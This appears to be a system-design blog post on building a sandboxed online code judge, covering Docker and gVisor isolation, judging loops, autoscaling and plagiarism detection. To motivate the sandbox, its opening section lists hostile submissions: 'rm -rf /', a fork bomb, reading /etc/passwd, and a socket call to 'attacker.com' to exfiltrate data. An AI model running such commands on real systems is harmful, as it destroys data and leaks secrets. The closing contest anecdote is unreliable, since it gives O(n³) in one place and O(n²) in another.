System Design: Online Code Judge — How LeetCode Runs Your Code Safely at Scale
LeetCode processes over 1 million code submissions per day at peak contest times. Running untrusted code at that scale is a hard security problem.
You get the question in the interview: “Design an online code judge like LeetCode.” Users submit Python, Java, C++, or JavaScript. The system compiles and runs their code against hidden test cases. It returns: Accepted, Wrong Answer, Time Limit Exceeded, Memory Limit Exceeded, or Runtime Error. And it must handle malicious code safely.
This post works through the problem from first principles — from naive process spawning all the way to production-grade container sandboxing, queue-based judging, and scaling to millions of submissions.
1. The core challenge: untrusted code execution
Running arbitrary user code is extremely dangerous. Consider what a malicious user could submit:
- import os; os.system("rm -rf /"): destroy the filesystem
- while True: pass: infinite loop, CPU starvation
- x = [0] * (10**12): allocate 8 TB, crash the machine
- import socket; socket.create_connection(("attacker.com", 443)): exfiltrate data
- import os; os.fork() in a loop: fork bomb, exhaust the process table
- open("/etc/passwd", "r").read(): read host secrets
The system must be completely sandboxed: every submission runs in an isolated environment where it cannot harm the host system, other users, or the network.
2. Sandbox approaches (progressive)
Spawn the user's code as a child process with a timeout. Simple and fast — but extremely weak. The process still runs as a system user with access to the full filesystem and network.
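As a minimal sketch of this weakest level, the snippet below runs a submission in a child interpreter and enforces only a wall-clock timeout. The function name `run_with_timeout` and the status strings are illustrative assumptions, and nothing here restricts filesystem or network access.

```python
import subprocess
import sys


def run_with_timeout(code: str, stdin_text: str = "", timeout_s: float = 2.0):
    """Run `code` in a child Python process and return (status, stdout).

    Only the wall-clock timeout is enforced: the child still has the
    parent's filesystem and network access, which is why this level is weak.
    """
    try:
        proc = subprocess.run(
            [sys.executable, "-c", code],
            input=stdin_text,
            capture_output=True,
            text=True,
            timeout=timeout_s,  # subprocess.run kills the child on expiry
        )
    except subprocess.TimeoutExpired:
        return "TLE", ""
    if proc.returncode != 0:
        return "RE", proc.stdout
    return "OK", proc.stdout
```

Calling `run_with_timeout("while True: pass", timeout_s=0.5)` returns a `"TLE"` status once the timeout fires.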
Use chroot to change the root directory for the process. The sandboxed process sees only a minimal directory tree and cannot reach /etc, /home, or other host paths. Better, but chroot isolates only the filesystem view: the process still shares the host kernel, network, and process table, so a kernel exploit escapes the jail entirely.
Run each submission in a Docker container: full Linux namespace isolation (filesystem, network, PID, user namespaces) combined with cgroup resource limits. Each submission gets a fresh container that is destroyed after execution. This is production-viable for most judges.
```bash
docker run \
  --network none \
  --memory 256m \
  --cpus 0.5 \
  --read-only \
  --pids-limit 64 \
  judge-runner:latest python3 solution.py
```
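A judge worker would typically assemble these flags programmatically rather than hard-code them. The sketch below builds the argument list for the invocation above; the `Limits` dataclass and `docker_argv` helper are hypothetical names, and `--rm` is added here on the assumption that the container should be removed as soon as it exits.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Limits:
    memory_mb: int = 256
    cpus: float = 0.5
    pids: int = 64


def docker_argv(image: str, command: list[str], limits: Limits = Limits()) -> list[str]:
    """Build a `docker run` argument list with the sandbox flags shown above."""
    return [
        "docker", "run", "--rm",            # --rm: assumption, remove container on exit
        "--network", "none",                # no network access
        "--memory", f"{limits.memory_mb}m",  # cgroup memory cap
        "--cpus", str(limits.cpus),          # CPU share cap
        "--read-only",                       # read-only root filesystem
        "--pids-limit", str(limits.pids),    # blunts fork bombs
        image, *command,
    ]
```

Passing the result to `subprocess.run` as a list (not a shell string) avoids shell injection through the image or command fields.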
gVisor implements a Linux-compatible kernel in Go running entirely in userspace. Syscalls from the sandboxed process go to gVisor's kernel, not the host kernel, so a kernel exploit only escapes into gVisor, which is itself isolated from the host. Firecracker (used by AWS Lambda) takes the other route: it boots a full microVM in roughly 125 ms using KVM hardware virtualization, giving VM-level isolation at close to container overhead.
3. System architecture
The submission flows through seven stages before a verdict reaches the user.
Payload:
{ "code": "...", "language": "python3", "problemId": 42, "userId": "u_abc" }
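Before a payload like this is queued, the API layer would normally validate it. The following is a minimal sketch of that check; the supported-language identifiers and the 64 KB size cap are assumptions made for illustration, not values from the original design.

```python
from dataclasses import dataclass

# Assumed values for illustration only.
SUPPORTED_LANGUAGES = {"python3", "java", "cpp", "javascript"}
MAX_CODE_BYTES = 64 * 1024


@dataclass(frozen=True)
class Submission:
    code: str
    language: str
    problem_id: int
    user_id: str


def parse_submission(payload: dict) -> Submission:
    """Validate the raw JSON payload and convert it to a typed Submission."""
    missing = {"code", "language", "problemId", "userId"} - payload.keys()
    if missing:
        raise ValueError(f"missing fields: {sorted(missing)}")
    if payload["language"] not in SUPPORTED_LANGUAGES:
        raise ValueError(f"unsupported language: {payload['language']!r}")
    if len(payload["code"].encode("utf-8")) > MAX_CODE_BYTES:
        raise ValueError("code exceeds size limit")
    return Submission(
        code=payload["code"],
        language=payload["language"],
        problem_id=int(payload["problemId"]),
        user_id=str(payload["userId"]),
    )
```

Rejecting oversized or malformed payloads at this stage keeps bad jobs out of the queue and away from the workers.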
4. Test case execution
“Special judge” programs are used when a problem has multiple valid answers, e.g. any valid topological sort of a graph. The special judge checks correctness rather than exact string equality.
For each test case the judge follows a strict loop:
```python
def judgeSubmission(submission, testCases):
    # spawnSandbox, injectCode, runInContainer, clock, the cgroup readers,
    # runSpecialJudge, normalize and summarize are the judge's own helpers
    # (not shown here).
    results = []
    for tc in testCases:
        container = spawnSandbox(submission.language)
        try:
            injectCode(container, submission.code)
            startTime = clock()
            startMem = cgroupMemUsage(container)
            proc = runInContainer(container, stdin=tc.input, timeout=tc.timeLimit)
            elapsed = clock() - startTime
            peakMem = cgroupPeakMem(container) - startMem
            exitCode = proc.exitCode
            stdout = proc.stdout
        finally:
            destroyContainer(container)  # always, even on crash

        if proc.timedOut:
            results.append({"status": "TLE", "tc": tc.id})
        elif peakMem > tc.memLimit:
            results.append({"status": "MLE", "tc": tc.id})
        elif exitCode != 0:
            results.append({"status": "RE", "tc": tc.id, "exitCode": exitCode})
        elif tc.specialJudge:
            ok = runSpecialJudge(tc, stdout)
            results.append({"status": "AC" if ok else "WA", "tc": tc.id})
        elif normalize(stdout) != normalize(tc.expected):
            results.append({"status": "WA", "tc": tc.id, "got": stdout})
        else:
            results.append({"status": "AC", "tc": tc.id, "time": elapsed, "mem": peakMem})

        if results[-1]["status"] != "AC":
            break  # early exit on first failure
    return summarize(results)
```
Measuring resource usage accurately:
- Wall time: measured by the host using clock_gettime(CLOCK_MONOTONIC) around wait4(), not self-reported by the process (CLOCK_REALTIME can jump when the system clock is adjusted)
- CPU time: read from cgroup cpuacct.usage after execution; this isolates pure compute time from I/O waits
- Peak memory: read from cgroup memory.max_usage_in_bytes, the high-water mark during the entire run (these are cgroup v1 names; on cgroup v2 the equivalents are cpu.stat and memory.peak)
- Output comparison: trim trailing whitespace and normalize line endings; many wrong answer bugs are whitespace issues
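The output-comparison rule in the last bullet can be sketched as follows. The exact normalization policy (here: unify line endings, strip trailing whitespace per line, drop trailing blank lines) is an assumption; real judges differ on details such as whether interior whitespace runs are collapsed.

```python
def normalize(output: str) -> list[str]:
    """Return output as a list of lines with line endings and trailing space normalized."""
    lines = output.replace("\r\n", "\n").replace("\r", "\n").split("\n")
    lines = [line.rstrip() for line in lines]
    # Drop blank lines at the end so a missing or extra final newline is ignored.
    while lines and lines[-1] == "":
        lines.pop()
    return lines


def outputs_match(actual: str, expected: str) -> bool:
    return normalize(actual) == normalize(expected)
```

Under this policy `"1 2 \r\n3\n\n"` matches `"1 2\n3"`, while a difference in interior spacing such as `"1  2"` versus `"1 2"` still counts as a mismatch.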
Special judges are separate programs that receive (input, expected_output, actual_output) and print OK or WRONG. Used for floating-point problems (accept output within 1e-6), multiple valid answers, or problems where the checker needs to verify a mathematical property.
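A floating-point special judge following that (input, expected_output, actual_output) contract might look like the sketch below. The function name `float_checker` and the choice to apply the 1e-6 tolerance both relatively and absolutely are assumptions.

```python
import math


def float_checker(input_text: str, expected_output: str, actual_output: str,
                  tol: float = 1e-6) -> str:
    """Return "OK" if every token of the answer is within tol of the expected value."""
    expected = expected_output.split()
    actual = actual_output.split()
    if len(expected) != len(actual):
        return "WRONG"
    for exp_tok, act_tok in zip(expected, actual):
        try:
            exp_val, act_val = float(exp_tok), float(act_tok)
        except ValueError:
            return "WRONG"  # non-numeric token in the output
        # isclose is False for NaN, so garbage values are rejected too.
        if not math.isclose(act_val, exp_val, rel_tol=tol, abs_tol=tol):
            return "WRONG"
    return "OK"
```

The `input_text` argument is unused here but kept in the signature, since checkers for multi-answer problems usually need the input to verify the answer.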
5. Language-specific considerations
Python is 10–100× slower than C++ for the same algorithm. LeetCode gives Python 5× more time than C++ to make the judge fair across languages.
Each language has unique sandboxing requirements and performance characteristics:
| Language | Time multiplier | Memory limit | Compilation | Key sandbox flags |
|---|---|---|---|---|
| C++ | 1× (baseline) | 256 MB | g++ -O2 -fsanitize=address,undefined | --read-only, seccomp profile |
| Java | 2× (JVM warmup) | 512 MB (container; heap capped by -Xmx256m) | javac, then java -Xmx256m | SecurityManager (older JVMs only), no exec() |
| Python | 5× (interpreter) | 256 MB | none (interpreted) | restrict os, subprocess, socket modules |
| JavaScript | 2× | 256 MB | none (Node.js) | --no-experimental-fetch, block fs.writeFile |
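The multipliers in the table translate into a per-language limit by simple scaling. This is a small sketch using the table's values; the dictionary keys and the function name are hypothetical.

```python
# Multipliers and memory limits taken from the table above.
TIME_MULTIPLIER = {"cpp": 1.0, "java": 2.0, "python": 5.0, "javascript": 2.0}
MEMORY_LIMIT_MB = {"cpp": 256, "java": 512, "python": 256, "javascript": 256}


def effective_limits(base_time_limit_s: float, language: str) -> tuple[float, int]:
    """Return (time limit in seconds, memory limit in MB) for a language."""
    return base_time_limit_s * TIME_MULTIPLIER[language], MEMORY_LIMIT_MB[language]
```

A problem with a 1-second C++ limit would then give Python 5 seconds and Java 2 seconds.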
C++ — The most dangerous language to sandbox. Users can call system(), exec(), open arbitrary file descriptors. Mitigations:
- Compile with -fsanitize=address,undefined to catch memory errors early
- Apply a seccomp (secure computing) filter that allows only the syscalls a solution needs (read, write, exit, and memory management such as brk and mmap) and blocks execve, fork, and socket
- Strip the binary after compilation to remove debug symbols
Java — The JVM takes 200–300 ms to warm up, so subtract this from the measured time. Use -Xmx256m -Xms32m to control the heap. The JVM’s built-in SecurityManager can block file I/O and network calls, but it was deprecated for removal in Java 17 and permanently disabled in Java 24; on current JVMs, rely on custom ClassLoader restrictions plus the container sandbox instead.
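Python — Restrict dangerous modules via a custom import hook or by setting their sys.modules entries to None, which makes a later import raise ImportError (merely deleting an entry does not stop a re-import). Such in-process restrictions can be bypassed, so treat them as defense in depth; the container is the real boundary. Running inside a Docker container with --read-only already prevents filesystem writes. The resource module can set RLIMIT_CPU and RLIMIT_AS from inside the process.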
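The resource-module limits mentioned above can be applied in the child just before the interpreter starts. This is a minimal, Linux-oriented sketch; `run_with_rlimits` and its default values are assumptions, and `preexec_fn` is only safe in a single-threaded parent.

```python
import resource
import subprocess
import sys


def run_with_rlimits(code: str, cpu_seconds: int = 2,
                     address_space_bytes: int = 512 * 1024 * 1024):
    """Run `code` in a child interpreter with CPU-time and address-space caps."""

    def apply_limits():
        # Runs in the child between fork() and exec(), so the limits
        # apply to the submission and not to the judge itself.
        resource.setrlimit(resource.RLIMIT_CPU, (cpu_seconds, cpu_seconds))
        resource.setrlimit(resource.RLIMIT_AS,
                           (address_space_bytes, address_space_bytes))

    return subprocess.run(
        [sys.executable, "-c", code],
        capture_output=True,
        text=True,
        preexec_fn=apply_limits,
    )
```

A child that exceeds RLIMIT_CPU is killed by a signal (negative `returncode`), while one that exceeds RLIMIT_AS typically fails with MemoryError and a non-zero exit code.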
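JavaScript (Node.js) — Node 20+ ships a permission model (enabled with --experimental-permission, renamed --permission in later releases) that denies filesystem, child-process, and worker access unless explicitly allowed; network isolation should still come from the container. Older versions: override require('fs').writeFile and require('net').connect in a wrapper script loaded with --require.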
6. Plagiarism detection
MOSS (Measure of Software Similarity) was developed by Alex Aiken in 1994, is hosted at Stanford, and is still the gold standard for academic plagiarism detection. It uses Winnowing fingerprinting.
Plagiarism detection runs asynchronously — it is not in the critical path of judging. After a submission is accepted, a background job compares it against other accepted solutions for the same problem.
Three approaches, increasing sophistication:
Token-based comparison — tokenize the code and map all identifiers to a canonical form (so variable names drop out), then compare token sequences using similarity metrics like Jaccard similarity or edit distance. Fast, and once identifiers are canonicalized it survives simple renaming, but it is still fooled by reordered statements or inserted dead code.
AST comparison — parse both programs to their Abstract Syntax Trees, then compare tree structure. Variable names are ignored. Reordering statements that are independent may fool this. Used by tools like JPlag.
MOSS fingerprinting — select representative substrings (k-grams) from the program using the Winnowing algorithm, hash them, compare hash sets across submissions. Robust to reformatting, variable renaming, and statement reordering. The classic choice.
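To make the first of these approaches concrete, here is a minimal sketch of token-based comparison for Python submissions using the standard tokenize module. Mapping every non-keyword name to `ID` and comparing 3-token shingles with Jaccard similarity are illustrative choices, not a description of any particular tool.

```python
import io
import keyword
import tokenize

# Token types that carry layout rather than program content.
_SKIP = {tokenize.COMMENT, tokenize.NL, tokenize.NEWLINE,
         tokenize.INDENT, tokenize.DEDENT, tokenize.ENDMARKER}


def canonical_tokens(source: str) -> list[str]:
    """Tokenize Python source, replacing identifiers and literals with placeholders."""
    tokens = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type in _SKIP:
            continue
        if tok.type == tokenize.NAME and not keyword.iskeyword(tok.string):
            tokens.append("ID")
        elif tok.type == tokenize.NUMBER:
            tokens.append("NUM")
        elif tok.type == tokenize.STRING:
            tokens.append("STR")
        else:
            tokens.append(tok.string)  # keywords and operators stay as-is
    return tokens


def token_similarity(a: str, b: str, k: int = 3) -> float:
    """Jaccard similarity over k-token shingles of the canonical token streams."""
    def shingles(tokens):
        return {tuple(tokens[i:i + k]) for i in range(max(len(tokens) - k + 1, 1))}

    sa, sb = shingles(canonical_tokens(a)), shingles(canonical_tokens(b))
    union = sa | sb
    return len(sa & sb) / len(union) if union else 1.0
```

Two solutions that differ only in variable names score 1.0 under this measure, which is exactly the renaming case the canonicalization is meant to catch.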
- Submission accepted → enqueue plagiarism job (low priority queue)
- Normalize code: strip comments, whitespace, rename variables to v1, v2, ...
- Compute MOSS fingerprint
- Compare against top-50 accepted solutions (by runtime similarity)
- If similarity > 85% → flag for human review
- Human reviewer confirms or dismisses the flag
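The fingerprinting step in this pipeline can be sketched with a small Winnowing implementation. It is a simplified illustration, not MOSS itself: normalization here only strips whitespace and lowercases (no variable renaming), fingerprint positions are dropped, and the k-gram length and window size are assumed values.

```python
import hashlib


def _normalize(code: str) -> str:
    # Simplified normalization: remove all whitespace and lowercase.
    return "".join(code.split()).lower()


def _kgram_hashes(text: str, k: int) -> list[int]:
    return [
        int.from_bytes(hashlib.sha1(text[i:i + k].encode("utf-8")).digest()[:8], "big")
        for i in range(len(text) - k + 1)
    ]


def winnow(code: str, k: int = 5, window: int = 4) -> set[int]:
    """Select the minimum hash from every window of consecutive k-gram hashes."""
    hashes = _kgram_hashes(_normalize(code), k)
    if not hashes:
        return set()
    if len(hashes) <= window:
        return {min(hashes)}
    return {min(hashes[i:i + window]) for i in range(len(hashes) - window + 1)}


def similarity(a: str, b: str, k: int = 5, window: int = 4) -> float:
    """Jaccard similarity of the two fingerprint sets."""
    fa, fb = winnow(a, k, window), winnow(b, k, window)
    union = fa | fb
    return len(fa & fb) / len(union) if union else 1.0
```

Any shared run of at least `window + k - 1` normalized characters is guaranteed to contribute a common fingerprint, which is the property that makes Winnowing robust to edits elsewhere in the file. A submission pair would be flagged when `similarity` exceeds the 0.85 threshold from the list above.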
7. Scaling
Judge Worker pool — autoscale on queue depth:
The queue depth (number of pending jobs) is the primary scaling signal. With Kubernetes HPA and a custom metrics adapter:
- Queue depth > 50 → scale up workers
- Queue depth < 5 for 5 minutes → scale down
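The two rules above amount to a small state machine: scale up immediately, scale down only after a sustained quiet period. The sketch below models that decision in isolation; the class name and return values are hypothetical, and in practice the HPA and metrics adapter would own this logic.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class QueueDepthScaler:
    scale_up_depth: int = 50       # queue depth above this -> add workers
    scale_down_depth: int = 5      # queue depth below this counts as quiet
    quiet_period_s: float = 300.0  # 5 minutes of quiet before scaling down
    _quiet_since: Optional[float] = None

    def decide(self, queue_depth: int, now_s: float) -> str:
        """Return "scale_up", "scale_down", or "hold" for one observation."""
        if queue_depth >= self.scale_down_depth:
            self._quiet_since = None          # quiet streak broken
        elif self._quiet_since is None:
            self._quiet_since = now_s         # quiet streak starts now
        if queue_depth > self.scale_up_depth:
            return "scale_up"
        if (self._quiet_since is not None
                and now_s - self._quiet_since >= self.quiet_period_s):
            return "scale_down"
        return "hold"
```

The asymmetry is deliberate: a burst should add workers right away, while a brief lull should not tear them down.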
Each worker handles one submission at a time. At ~2s average execution time and 100 submissions/second, you need ~200 workers at steady state — with headroom to ~500 for contest bursts.
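That worker count follows from Little's law: the average number of jobs in service equals arrival rate times service time. A quick check of the arithmetic, with `target_utilization` as an assumed knob for headroom:

```python
import math


def workers_needed(arrival_rate_per_s: float, avg_service_time_s: float,
                   target_utilization: float = 1.0) -> int:
    """Workers required so that busy workers stay at or below the target utilization."""
    return math.ceil(arrival_rate_per_s * avg_service_time_s / target_utilization)


print(workers_needed(100, 2.0))       # 100 jobs/s x 2 s each
print(workers_needed(100, 2.0, 0.5))  # same load, workers kept half busy
```

Running workers below full utilization is what leaves room for contest bursts without queue depth growing unbounded.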
Warm container pool:
Cold-starting a Docker container takes 1–3 seconds (pulling layers, initializing the runtime). During peak load, this adds noticeable latency. Solution: maintain a pool of pre-started containers per language:
- Worker picks up a warm container instead of cold-starting
- Container is destroyed after one use (fresh container = no state leakage)
- A separate pool manager continuously refills the warm pool
Container reuse (for trusted languages):
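For JavaScript with a locked-down runtime, the container can be reused across submissions. Between submissions: reset the sandbox directory and restart the Node.js process. That is a ~50 ms reset versus ~200 ms to hand out a fresh container from the warm pool. Use this only when the language runtime can be reliably reset, because reuse gives up the no-state-leakage guarantee of single-use containers.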
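```python
import asyncio


class WarmPool:
    # startContainer / destroyContainer are the judge's container helpers (not shown).
    def __init__(self, language, target_size=10):
        self.language = language
        self.target_size = target_size
        self.pool = asyncio.Queue()
        self._refill_task = None

    def start(self):
        # Call from inside a running event loop; keeps the pool topped up.
        self._refill_task = asyncio.create_task(self._refill_loop())

    async def _refill_loop(self):
        while True:
            while self.pool.qsize() < self.target_size:
                c = await startContainer(self.language)
                self.pool.put_nowait(c)
            await asyncio.sleep(0.1)  # check every 100 ms

    async def acquire(self):
        if self.pool.empty():
            return await startContainer(self.language)  # cold start fallback
        return self.pool.get_nowait()

    def release(self, container):
        destroyContainer(container)  # never return to pool: single use
```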
Geographic placement:
Judge workers should run in the same region as the users. A submission from a user in Singapore that is judged in Virginia has 150ms of network RTT added to the wait time — for a fast algorithm that finishes in 50ms, that is the dominant latency. Use CDN routing and regional worker deployments.
8. Interactive code judge demo
Problem: Given an array of integers, return their sum. Input: space-separated integers. Output: a single integer.
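The judging flow for this problem can be tried offline with a small script. This is a minimal sketch with no sandboxing at all (it simply runs the solution in a child Python process), and the test cases and verdict strings are assumptions chosen for illustration.

```python
import subprocess
import sys

# (stdin, expected stdout) pairs for the sum problem; assumed for illustration.
TEST_CASES = [("1 2 3", "6"), ("-5 5", "0"), ("42", "42")]


def judge(solution_code: str, test_cases=TEST_CASES, time_limit_s: float = 2.0) -> str:
    """Run the solution on each test case and return the first non-accepting verdict."""
    for stdin_text, expected in test_cases:
        try:
            proc = subprocess.run(
                [sys.executable, "-c", solution_code],
                input=stdin_text,
                capture_output=True,
                text=True,
                timeout=time_limit_s,
            )
        except subprocess.TimeoutExpired:
            return "Time Limit Exceeded"
        if proc.returncode != 0:
            return "Runtime Error"
        # Compare whitespace-separated tokens so trailing newlines do not matter.
        if proc.stdout.split() != expected.split():
            return "Wrong Answer"
    return "Accepted"
```

For example, `judge("print(sum(map(int, input().split())))")` passes all three cases, while `judge("print(0)")` fails on the first.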
9. Capacity estimate
| Metric | Value |
|---|---|
| Submissions / day (LeetCode scale) | ~1 million |
| Peak submissions / second (contest) | ~100 / sec |
| Average execution time per submission | ~1–2 seconds |
| Judge workers needed (steady state) | ~200 |
| Judge workers needed (peak burst) | ~500 |
| Warm container pool size (per language) | ~50 containers |
| Container boot time (warm pool) | ~180–220 ms |
| Container boot time (cold start) | ~1.5–3 seconds |
| Code storage per submission (compressed) | ~5 KB avg |
| Total code storage per year | ~1.8 TB (1M/day × 365 × 5KB) |
| Result storage per submission | ~1 KB (verdict + per-test stats) |
| Total result storage per year | ~365 GB |
| Queue message size | ~2 KB (code + metadata) |
| Network bandwidth (queue + DB) | ~5 MB/s at peak |
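The storage rows in the table are straightforward multiplication and can be re-derived as a sanity check. The sketch below uses decimal units (1 KB = 1,000 bytes), which is an assumption about how the table's figures were rounded.

```python
SUBMISSIONS_PER_DAY = 1_000_000
SECONDS_PER_DAY = 86_400


def yearly_storage_gb(bytes_per_submission: int) -> float:
    """Storage added per year, in GB, at the table's submission volume."""
    return SUBMISSIONS_PER_DAY * 365 * bytes_per_submission / 1e9


code_gb = yearly_storage_gb(5_000)     # ~5 KB of compressed code per submission
result_gb = yearly_storage_gb(1_000)   # ~1 KB of verdict data per submission
average_rate = SUBMISSIONS_PER_DAY / SECONDS_PER_DAY

print(f"code: {code_gb / 1000:.2f} TB/year, results: {result_gb:.0f} GB/year")
print(f"average rate: {average_rate:.1f} submissions/s")
```

The average rate comes out far below the 100 per second contest peak, which is why the queue and autoscaling matter more than raw steady-state capacity.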
Summary: system design checklist
| Concern | Design choice |
|---|---|
| Sandbox | Docker with --network none, --memory, --read-only, --pids-limit + seccomp profile |
| Queue | Redis Streams or AWS SQS — durable, at-least-once delivery, dead-letter queue for failures |
| Result delivery | WebSocket push via Redis pub/sub; polling as fallback |
| Time measurement | Host-side wall clock + cgroup cpuacct.usage — never trust self-reported time |
| Memory measurement | cgroup memory.max_usage_in_bytes — peak high-water mark |
| Cold start latency | Pre-warm container pool of ~50 containers per language |
| Autoscaling | Kubernetes HPA on queue depth metric — scale up fast, scale down slow |
| Higher isolation | gVisor (runsc) for maximum security; Firecracker microVMs for VM-level isolation |
LeetCode runs on AWS. Their judging infrastructure uses a combination of ECS (Elastic Container Service) and custom-built judge workers. The company processes over 1 million code submissions per day at peak contest times.
LeetCode’s infrastructure runs on Amazon ECS. Their judge workers are custom-built containers that receive jobs from an internal queue. At peak contest times — when tens of thousands of participants submit simultaneously — the queue acts as a buffer, absorbing burst load that would overwhelm a synchronous system. The warm container pool keeps perceived latency low even when the queue is deep: you wait for a worker, but once a worker picks up your job, the container is ready immediately.
The 2022 LeetCode Weekly Contest had a famous incident: a Python solution that should have TLE’d was accepted because Python 3.11 optimizations made an O(n³) solution fast enough. The community debated the validity for days.
The strictness of judging matters enormously for competitive programming. A 2022 example: Python 3.11 introduced significant performance improvements (the “Faster CPython” project), and some O(n²) solutions that should have timed out started passing. Version upgrades have also cut the other way, with solutions that were accepted for years suddenly failing afterwards. Maintaining separate per-language time limits that account for interpreter version performance is a continuous maintenance burden.
gVisor (used by Google Cloud Run and App Engine) implements a Linux kernel in Go running in userspace. Syscalls from the sandboxed process go to gVisor’s kernel, so even if the process exploits a kernel bug, it exploits gVisor, not the host OS kernel.
gVisor’s approach is elegant: instead of letting user processes talk to the Linux kernel directly (with all its exploitable surface area), gVisor interposes a userspace kernel. Every syscall from the sandboxed process is handled by gVisor’s Sentry component, written in Go, which either handles it internally or translates it to a safe subset of host syscalls. The attack surface shrinks from the entire Linux kernel to gVisor’s much smaller, memory-safe Go implementation. Google Cloud Run and Cloud Functions run on gVisor — it is production-hardened at planetary scale.